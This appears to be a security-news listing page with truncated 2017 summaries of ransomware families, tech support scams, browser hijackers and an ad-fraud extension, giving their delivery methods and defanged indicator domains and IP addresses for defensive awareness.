PC security researchers first observed the WhyCry Ransomware on June 13, 2017. The WhyCry Ransomware was observed in the wild, being distributed through the use of documents that use compromised macros to download and install the WhyCry Ransomware onto the victim's computer. These documents were being delivered by spam email messages that use social engineering techniques to trick computer users into downloading and installing the WhyCry Ransomware onto their computers. The WhyCry Ransomware is a low-level ransomware variant that is the work of amateurs clearly, probably compiled by copying and pasting portions of code from other sources rather than through a real development process. It is likely that the WhyCry Ransomware was largely derived from the Haters Ransomware and its variants, first observed in May 2017. There's a Lot of...

The CA$HOUT Ransomware is an encryption ransomware Trojan. The CA$HOUT Ransomware first caught the attention of PC security researchers because its code is simply a complete mess, according to some researchers. The CA$HOUT Ransomware seems to be created by pasting together different bits of code from various other ransomware Trojans. The CA$HOUT Ransomware was first observed on June 13, 2017, and it is clearly developed by amateurs rather than by a well-funded programmer. However, the CA$HOUT Ransomware does carry out an effective encryption ransomware attack. The CA$HOUT Ransomware may not Find Too Many Files to be Encrypted The most common way of delivering the CA$HOUT Ransomware to its victims is through the use of corrupted documents attached to spam email messages. These will use corrupted scripts and macros to download and...

The StrutterGear Ransomware is a ransomware Trojan that seems to be a variant of the Jigsaw Ransomware, a family of ransomware that has been active for quite a while and that used in its themes elements from the Saw movies and their iconic Jigsaw character. The StrutterGear Ransomware was first observed on June 2017 on online anti-virus platforms, which may be used by con artists to test their ransomware variants to see whether they can evade detection by established ransomware Trojans. There are several variants of the StrutterGear Ransomware, all released in 2017 and targeting computers running the Windows operating system. The StrutterGear Ransomware may be released publicly, but for now, it exists in a test version that seems to be incomplete. The StrutterGear Ransomware Belongs to the Jigsaw Family of Ransomware Trojans The...

The Ogre Ransomware is an encryption ransomware Trojan that was first observed by malware researchers on an online anti-malware scanner (it is common to find these threats uploaded to these locations as part of their creators' testing methods, to find out if they can bypass commonly used anti-virus programs). When PC security researchers observed the Ogre Ransomware, it was clear that it was still in a testing phase. However, it is not unlikely that a full version of the Ogre Ransomware will be released publicly eventually. The Ogre Ransomware seems to be designed to mimic the behavior of the Petya Ransomware, another well-known threat. The Ape Ogre The Ogre Ransomware receives its name because it marks the files it infects with the file extension '.ogre,' which is added to the end of each encrypted file name. The Ogre Ransomware will...

The 'Firewall Breach Detected' messages in your browser are not to be trusted. The alerts displayed on a Web page suggesting that your firewall was breached, are identified as fake security alerts. The 'Firewall Breach Detected' pop-ups are generated on deceptive sites, which include a screen capture of Support.microsoft.com and aim to convince the user to call a toll-free phone line like 844-699-8351. Legitimate computer support agents do not operate the 844-699-8351 phone line, as well as other lines advertised on the same 'Firewall Breach Detected' notifications. The screen capture of Support.microsoft.com is a modified image that is used to claim credibility and fool the users into thinking that the security alert on their screens comes from Microsoft Corp. directly. The 'Firewall Breach Detected' warnings provide misleading...

Funny enough, computer hackers sometimes don't get the credit they deserve when it comes to creating crafty methods for infecting PCs around the world. As it turns out, credit is due to a group of hackers who have initiated an aggressive spam campaign that spread malware that doesn't require a mouse click to infect your PC. The recent spam email campaign sharing messages that only require you to hover your mouse over text within the attached file to load malware could very well be the beginning of a new type of method to spread malware. As scary as it sounds, the methodology of spreading malware through what is found as being a malicious PowerShell script has not yet been widely used by hackers. In fact, the recent spread of the campaign has drastically slowed down but still remains to be a threat to some. According to computer...

When computer security experts are discussing the 'Windows Defender Alert: Zeus Virus' Tech Support Scam they refer to fake computer support agents whose "services" are advertised on unreliable sites. The campaign associated with the 'Windows Defender Alert: Zeus Virus' Tech Support Scam is based on sites registered recently that have random names and may appear to be gibberish and refer to a virus detected on the system. The 'Windows Defender Alert: Zeus Virus' messages are reported to be hosted on sites registered to the 107.180.55.9 IP address. Numerous domains are being used to deliver the 'Windows Defender Alert: Zeus Virus' pop-ups to users across the globe and some of the domains include: ransomewaredetected[.]xyz malwarethreatdetect[.]xyz rasagulsdasdeaa[.]xyz palkovasdareadas[.]xyz othavirusda[.]xyz omalavirusdadsad[.]xyz...

The Video Ads Blocker software by youtubeadblock.net is promoted as a browser extension that can block native ads on YouTube. As its name suggests, the Video Ads Blocker is supposed to allow Web surfers to browse video content without having to tolerate five seconds long adds and click the 'Skip' button. That may seem annoying to some users, and you may like to install the Video Ads Blocker on your computer. What you should consider is that YouTube is an ad-supported platform (like Vimeo, Metacafe and Dailymotion)—the content creators make money from getting their videos monetized by displaying advertisement. Additionally, the Video Ads Blocker software may block ads on Youtube.com, but it is designed to connect to ad portals and click on advertisements in the background. The Video Ads Blocker by youtubeadblock.net is classified as...

The Loadstart.biz site is presented to users as a search service and new tab replacement. The site Loadstart.biz has no rank on Alexa.com and Hyperstat.com has no information on the site. Evidently, Loadstart.biz was registered on May 26th, 2017 and was soon reported in relation to cases of browser hijacking. Loadstart.biz is associated with the 50.7.122.18 and the 198.105.208.113 IP addresses. PC users may install the Loadstart.biz browser hijacker as a component of a free program bundle deployed via the Installmachine.com platform. Network analysis revealed that the Loadstart.biz site acts as a redirect-gateway to Google.com and does not work as a legitimate search service. Also, users may experience pop-up windows that load content from h[tt]p://get1.installmachine.com/data/?track_id=[RANDOM CHARACTERS] and offer access to free...

The 'RDN_YahLover.worm' pop-up windows are part of the "RDN_YahLover.worm Infection Scam" that was observed for the first time back in May. PC users reported notifications in their browser that said they were infected with a computer worm named RDN_YahLover.worm. Cyber security experts use the detection name 'RDN_YahLover.worm' in reference to a real threat. However, the 'RDN_YahLover.worm' security alerts in the browser should not be trusted. The "RDN_YahLover.worm Infection Scam" is the work of con artists that took the name of a threatening program and created a persistent dialog box shown to users on sites like web-alrt-phsng-atck[.]xyz, warningalert[.]xyz and many others. The pages used to generate the 'RDN_YahLover.worm' notifications include a script designed to crash the user's browser and incite distress. The...

The '.sVn File Extension' Ransomware is a variant of the Jaff Ransomware, which also goes by the name of Jeff Decryptor Ransomware. This variant was released a few weeks after its predecessor. The '.sVn File Extension' Ransomware uses a typical delivery method. The '.sVn File Extension' Ransomware may be sent to victims in the form of macro-enabled documents, which leverage known vulnerabilities in Microsoft Office and on the software to run scripts on the victim's computer that download and install the '.sVn File Extension' Ransomware there. These file attachments are contained in spam email campaigns that include the file attachments in email messages that pretend to come from legitimate companies such as social media platforms or online retailers. It is essential to learn to spot these hoaxes and avoid opening any unsolicited email...

The xXLecXx Ransomware is a lock screen ransomware Trojan. What this means is that the xXLecXx Ransomware is designed to take the victim's computer hostage by displaying a lock screen, which is a full-screen message that prevents the victim from using the affected computer. Lock screen Trojans were an especially popular threat variant several years ago, with various tactics associated with them. For example, one variety of lock screen ransomware Trojans would impersonate the law enforcement, tricking the victim into thinking that the police have locked their computers, in an attempt to extract a 'fine.' These ransomware Trojans have been replaced by encryption ransomware Trojans largely, which instead take the victim's data hostage by encrypting it with a strong encryption algorithm. This is a more effective attack because, even if the...

The CryptoGod Ransomware is an encryption ransomware Trojan that is part of a ransomware family that has been active at least since May 2017. The threats in the CryptoGod Ransomware family carry out a typical ransomware attack, consisting of encrypting the computer user's files using a strong encryption algorithm and then demanding the payment of a ransom from the victim. There are multiple versions of the CryptoGod Ransomware and its variants. The most common way in which the CryptoGod Ransomware is distributed is by including it as a spam email attachment that uses corrupted macros to deliver its payload to the victim. PC security analysts advise computer users to take steps to protect their data from threats like the CryptoGod Ransomware. All this God Wants is Your Money The CryptoGod Ransomware poses a real threat to computer...

PC security researchers have been tracking the Spectre Ransomware for some time. This ransomware Trojan was observed in testing mode approximately on June 9th but was released in a full version a few days later. It seems that the Spectre Ransomware is a sophisticated ransomware Trojan and that considerable time and resources have been extended in creating this threat. Because of this, PC security researchers consider it possible that the Spectre Ransomware and its variants may become an important threat to computer users. The Specter of a Spectre Haunting Your Files The Spectre Ransomware carries out a typical encryption ransomware Trojan attack, which involves encrypting the victims' files and then requesting a ransom. The Spectre Ransomware was first observed in a testing mode, where it connected to its Command and Control server to...

The Xlsearch.net site is offered to Web surfers as a search service, but it was mentioned in cases of browser hijacking in the second week of June 2017. The Xlsearch.net site is registered to the 54.214.50.188 IP address and appears to be connected to several gateways that we have added to our database of browser hijackers. Evidently, Xlsearch.net browser hijacker behaves a lot like those associated with Usearch.co.id and Searchiincognito.com, which are registered on the same IP address. The Xlsearch.net browser hijacker is aimed at users in Indonesia primarily, but users in other countries may be infected as well. The browser hijacker responsible for redirects to Xlsearch.net may be spread among PC users via means of software bundling, which is a common strategy in the cyber world. Web surfers that are infected with the Xlsearch.net...